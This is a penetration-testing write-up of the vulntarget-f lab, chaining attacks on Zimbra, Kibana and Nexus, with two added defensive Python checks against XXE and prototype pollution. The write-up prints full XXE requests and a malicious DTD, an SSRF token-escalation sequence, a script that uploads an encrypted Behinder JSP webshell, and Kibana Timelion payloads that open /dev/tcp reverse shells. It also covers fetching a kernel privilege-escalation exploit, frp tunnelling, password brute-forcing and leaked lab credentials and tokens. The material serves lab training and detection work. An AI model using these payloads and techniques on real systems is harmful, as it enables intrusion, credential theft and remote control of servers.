Machine credentials: external CentOS: root/vulntarget-f; internal Ubuntu and second-layer internal Ubuntu: root/Vulntarget#
Topology diagram:
The password for the external CentOS box couldn't be found (I tried quite a few and none worked), so we reset the CentOS password here.
Reboot, and at the GRUB menu press e on the first entry to edit it:
1. change ro to rw
2. append init=/bin/sh after LANG=en_US.UTF-8
Press Ctrl+X to boot the edited entry
At the shell, run passwd to change the password
vi /etc/sysconfig/selinux # disable SELinux; here it is already disabled, so no change is needed
exec /sbin/init # restart the system, completing the password reset
Later, while attacking, I found that after the reset everything under /tmp gets wiped, which makes the flag unobtainable; after simply restoring the snapshot, oddly enough the target host could be scanned again. The CentOS environment is also said to have some issues and to need rebuilding according to the documentation, but on my side the restored snapshot worked fine; if you run into problems you can build it yourself following the documentation below.
Scanning for live hosts and ports shows 22, 443 and other ports open, and Zimbra is present.
Visiting the web interface looks like this:
The module built into msf can be used to attack it.
Once msf has a session, get a reverse shell:
python -c 'import pty; pty.spawn("/bin/bash")'
A flag is found in the root directory, but we don't have permission to cat it, so privilege escalation is needed; first, some information gathering.
I tried the Linux kernel privilege-escalation exploits without success; later I found the root password under /tmp/login_data/root: vulntarget-f
Flag obtained: vulntarget-f{------dsjlkfj489rjgr----}
The above was only to check that the external CentOS host works, using msf's ready-made module. To rely less on msf, let's also work through it by hand: a webshell can be uploaded by chaining XXE and SSRF.
Zimbra's configuration file is /conf/localconfig.xml, which stores usernames and passwords from the configuration.
First, verify the CVE-2019-9670 XXE vulnerability: change the method to POST, the URL to /Autodiscover/Autodiscover.xml, and Content-Type to application/xml. Here we can successfully read /etc/passwd, which confirms the vulnerability.
PoC:
POST /Autodiscover/Autodiscover.xml/ HTTP/1.1
Host: 192.168.150.141:7071
Cookie: ZA_SKIN=serenity; ZA_TEST=true; ZM_TEST=true
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Content-Type: application/xml
Te: trailers
Connection: close
Content-Length: 346

<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>
Next we construct a payload to read Zimbra's configuration file. Because the file is itself XML, it has to be wrapped in a CDATA section to be read back as text, and XXE does not allow that concatenation with internal entities, so we start a web server on Kali to host an external DTD, then reuse the earlier request to fetch the XML and obtain the password: XbVaoX3Y
poc.dtd:
<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">
PoC:
POST /Autodiscover/Autodiscover.xml/ HTTP/1.1
Host: 192.168.150.141:7071
Cookie: ZA_SKIN=serenity; ZA_TEST=true; ZM_TEST=true
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Content-Type: application/xml
Te: trailers
Connection: close
Content-Length: 404

<!DOCTYPE Autodiscover [
<!ENTITY % dtd SYSTEM "http://192.168.150.128/poc.dtd">
%dtd;
%all;
]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
</Request>
</Autodiscover>
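From the defender's side, the fix for both requests above is to refuse DTD machinery before any entity can name a file or URL. The added example below is not Zimbra code: it parses an Autodiscover body with Python's stdlib expat and aborts on a DOCTYPE, an entity declaration or an external reference (the same policy defusedxml enforces), then runs three constructed bodies through it; dtd-host.example is a placeholder.

```python
import xml.parsers.expat

class UnsafeXml(Exception):
    """The document used DTD features (DOCTYPE, entities)."""

def parse_without_dtd(data: bytes) -> str:
    """Parse with expat, aborting on any DTD machinery; returns the root tag.
    Mirrors defusedxml's forbid_dtd/forbid_entities policy: the handlers
    raise before any file or URL named in an entity could be touched."""
    parser = xml.parsers.expat.ParserCreate()
    root = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXml(f"DOCTYPE {name!r} rejected")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXml(f"entity declaration {name!r} rejected")

    def on_external_ref(context, base, sysid, pubid):
        raise UnsafeXml(f"external entity {sysid!r} rejected")

    def on_start(name, attrs):
        if not root:
            root.append(name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    parser.Parse(data, True)
    return root[0]

def is_rejected(data: bytes) -> bool:
    try:
        parse_without_dtd(data)
    except UnsafeXml:
        return True
    return False

# Constructed samples shaped like the two Autodiscover bodies above
# (placeholder DTD host) plus one benign request.
XXE_FILE = (b'<!DOCTYPE xxe [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
            b"<Autodiscover><Request><AcceptableResponseSchema>&xxe;"
            b"</AcceptableResponseSchema></Request></Autodiscover>")
XXE_EXT_DTD = (b'<!DOCTYPE Autodiscover [<!ENTITY % dtd SYSTEM '
               b'"http://dtd-host.example/poc.dtd">%dtd;%all;]>'
               b"<Autodiscover><Request><AcceptableResponseSchema>"
               b"&fileContents;</AcceptableResponseSchema></Request></Autodiscover>")
BENIGN = (b"<Autodiscover><Request><EMailAddress>user@example.org"
          b"</EMailAddress></Request></Autodiscover>")
```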
Next, use the obtained password to get a low-privilege token: send an AuthRequest to the SOAP interface, with the URL set to /service/soap or /service/admin/soap, and a low-privilege token is returned.
PoC:
POST /service/admin/soap HTTP/1.1
Host: 192.168.150.141:7071
Cookie: ZA_SKIN=serenity; ZA_TEST=true; ZM_TEST=true
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Content-Type: application/xml
Te: trailers
Connection: close
Content-Length: 463

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
<soap:Header>
<context xmlns="urn:zimbra">
<userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>
</context>
</soap:Header>
<soap:Body>
<AuthRequest xmlns="urn:zimbraAccount">
<account by="adminName">zimbra</account>
<password>XbVaoX3Y</password>
</AuthRequest>
</soap:Body>
</soap:Envelope>
# ZM_AUTH_TOKEN=0_2d4b50e77e5ae4298afd620f5d90d68e61dc8bcf_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313637303637343037373736323b747970653d363a7a696d6272613b7469643d31303a313836303539373536383b;
Then use the SSRF vulnerability in the proxy endpoint to reach the SOAP interface and obtain a high-privilege token. Visit /service/proxy?target=https://127.0.0.1:8443/service/admin/soap, capture the request, change it to POST, set the cookie to the low-privilege token obtained above (with the cookie name changed to ZM_ADMIN_AUTH_TOKEN), and change xmlns to urn:zimbraAdmin.
PoC:
POST /service/admin/soap/ HTTP/1.1
Host: 192.168.150.141:7071
Cookie: ZM_ADMIN_AUTH_TOKEN=0_2d4b50e77e5ae4298afd620f5d90d68e61dc8bcf_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313637303637343037373736323b747970653d363a7a696d6272613b7469643d31303a313836303539373536383b;
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Content-Type: application/xml
Te: trailers
Connection: close
Content-Length: 461

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
<soap:Header>
<context xmlns="urn:zimbra">
<userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>
</context>
</soap:Header>
<soap:Body>
<AuthRequest xmlns="urn:zimbraAdmin">
<account by="adminName">zimbra</account>
<password>XbVaoX3Y</password>
</AuthRequest>
</soap:Body>
</soap:Envelope>
# ZM_ADMIN_AUTH_TOKEN=0_e78154820c9cf010bff124807fd2a5d976753ba1_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313637303534353633313531323b61646d696e3d313a313b747970653d363a7a696d6272613b7469643d393a3239333533313533393b;
Finally, use the high-privilege token to upload a file and get a shell. Here we use a Python script to upload the webshell; the shell path is /downloads/shell.jsp (the ADMIN_AUTH_TOKEN must be sent when accessing the shell).
import requests

file = {
    'filename1': (None, "whocare", None),
    'clientFile': ("shell.jsp", r'<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*this key is the first 16 characters of the 32-character MD5 of the connection password; the default connection password is rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>', "text/plain"),
    'requestId': (None, "12", None),
}  # what I upload here is a Behinder (冰蝎) webshell
headers = {
    "Cookie": "ZM_ADMIN_AUTH_TOKEN=0_e78154820c9cf010bff124807fd2a5d976753ba1_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313637303534353633313531323b61646d696e3d313a313b747970653d363a7a696d6272613b7469643d393a3239333533313533393b",  # replace with the admin token obtained above
    "Host": "foo:7071"
}
r = requests.post("https://192.168.150.141:7071/service/extension/clientUploader/upload", files=file, headers=headers, verify=False)  # the IP also needs to be changed
print(r.text)
After the upload succeeds, connect with Behinder (冰蝎), adding the Cookie request header; the shell path is:
https://192.168.150.141:7071/downloads/shell.jsp
# password: rebeyond
From here on the steps are the same as before.
Set up a proxy with frp:
./frps -c ./frps.ini
./frpc -c ./frpc.ini &
Upload fscan and scan the internal network: host 192.168.20.129 is found with ports 22, 5601, 9200 and 9300 open.
Visiting it shows the following; it is Kibana.
Searching for related vulnerabilities turns up CVE-2019-7609, a Kibana remote code execution vulnerability.
PoC:
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/You_VPS/You_VPS_Port 0>&1\'");//') .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/You_VPS/You_VPS_Port 0>&1");process.exit()//') .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
Reproduction
In the navigation bar click Timelion, enter the following reverse-shell PoC in the text box and run it:
# the content inside exec() is the code that gets executed
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/192.168.20.128/8888 0>&1\'");process.exit()//').props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
Then click Canvas in the left navigation bar, and the shell comes back.
Alternatively, attack directly with the exp (it didn't work for me; the lab environment has some issues):
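What makes the Timelion expression above dangerous is not the JavaScript body but the key path: assigning through label.__proto__ pollutes every object's env, so NODE_OPTIONS is picked up by the child process. The added example below (not Kibana code) extracts each .props() key path from an expression and flags any that walks through __proto__, constructor or prototype; the sample expressions are constructed, with a harmless stand-in for the JS body.

```python
import re

# Path segments a legitimate Timelion .props() key never needs to traverse.
POLLUTION_KEYS = {"__proto__", "constructor", "prototype"}

# Key path of each .props(<key>=...) call, e.g. "label.__proto__.env.X".
PROPS_KEY = re.compile(r"\.props\(\s*([A-Za-z_$][\w$.]*)\s*=")

def pollution_findings(expression: str) -> list:
    """Return the .props() key paths in a Timelion expression that walk
    through __proto__/constructor/prototype, the CVE-2019-7609 pattern.
    The check is on the key path only, so the JS payload text is irrelevant."""
    return [key for key in PROPS_KEY.findall(expression)
            if POLLUTION_KEYS.intersection(key.split("."))]

# Constructed sample expressions: one ordinary chart, two shaped like the
# prototype-pollution payload above (the JS body is a harmless stand-in).
SAMPLES = {
    "benign": '.es(*).props(label="cpu load").color("#ff0000")',
    "proto": ".es(*).props(label.__proto__.env.AAAA='/* injected js */')"
             " .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')",
    "ctor": '.es(*).props(label.constructor.prototype.env.X="1")',
}
```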
python2 CVE-2019-7609-kibana-rce.py -u 192.168.20.129:5601 -host 192.168.20.128 -port 8888 --shell
Then nc listening on port 8888 receives the connection; after some information gathering, a network interface on 192.168.30.128 turns up.
Next I tried Ubuntu kernel privilege escalation and the like; in the end CVE-2022-0847, compiled locally, uploaded and run, escalated successfully.
First compile it locally and start a web server:
./compile.sh
python -m http.server 80
Then download it on CentOS and start a web server there:
wget http://192.168.150.128/exploit
python -m SimpleHTTPServer 80
Downloading the compiled exp on the Ubuntu box then hung with no response; later it reported no permission to download, so downloading under the tmp directory instead succeeded:
cd tmp
wget http://192.168.20.128/exploit
Run the exp to escalate; it errors out saying the version I compiled against is too new:
chmod +x exploit
./exploit
Later I compiled it on a lower version, Ubuntu 18.04, and escalated successfully, finding the flag: vulntarget{admin/top1000.txt}
There is also an all-in-one privilege-escalation tool, traitor, that can be used (but I didn't get it to work here).
Upload fscan again and scan the internal network: there is another interface, 192.168.30.129, with ports 22 and 8081 open.
Next upload frp to set up a proxy:
chmod 777 frpc # with +x alone it still reports permission denied here, not sure why
nohup ./frpc -c ./frpc.ini &
Visiting port 8081 shows the following; it is Nexus 3.21.0-05.
Searching its vulnerabilities shows it may be affected by CVE-2020-10199, a remote code execution vulnerability, but that requires valid credentials, and the weak passwords I tried didn't work. Looking back at the flag we obtained earlier, we can guess the username here is admin and the password is one from top1000, so we brute-force it with Burp. The captured request shows the credentials are encoded, and it is easy to see that the encoding is base64.
So set the payload processing to base64 and add the top1000 wordlist.
After the brute force, base64-decode the password: abcdef
After logging in, capture the request to get the post-login cookie and the CSRF attribute.
But command execution then failed here.
However, the affected versions are Nexus Repository Manager OSS/Pro 3.x <= 3.21.1; trying the exp directly succeeded, and the flag was found: vulntarget-f{(^_^ this__is__flag ^_^}